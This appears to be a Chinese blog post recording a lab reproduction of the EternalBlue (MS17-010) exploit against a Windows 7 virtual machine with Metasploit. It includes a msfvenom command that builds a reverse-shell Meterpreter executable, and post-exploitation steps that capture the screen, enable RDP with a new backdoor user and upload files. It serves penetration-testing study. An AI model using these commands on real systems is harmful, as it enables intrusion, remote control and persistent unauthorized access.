复现ms17_010永恒之蓝漏洞

msf攻击永恒之蓝

1.输入msfconsole进入msf6
在这里插入图片描述

在这里插入图片描述

3.在安装完成win7靶机之后
在这里插入图片描述

4.run 攻击成功
在这里插入图片描述

msf后门木马植入和远控监听

msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.200.129 lport=4444 -f exe -o demo.exe
在这里插入图片描述

进入后渗透阶段

1.getuid

2.sysinfo
在这里插入图片描述

在这里插入图片描述

4.screenshot 截屏 成功截取到win7当前桌面的图片
在这里插入图片描述
在这里插入图片描述

5.远程控制桌面 新建一个test用户

meterpreter > run post/windows/manage/enable_rdp USERNAME=test PASSWORD=123456

连接成功
在这里插入图片描述

但是缺点是对方会有显示
在这里插入图片描述

6.上传图片 upload 图片名.jpeg

上传成功,上传的位置为windows/system32
在这里插入图片描述

遇到的问题

connection 失败 拒绝远程连接

解决方法:

1.检查win7中的445端口是否开放,并且将防火墙进行关闭操作

2.检查kali和win7之间是否可以互相ping通

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值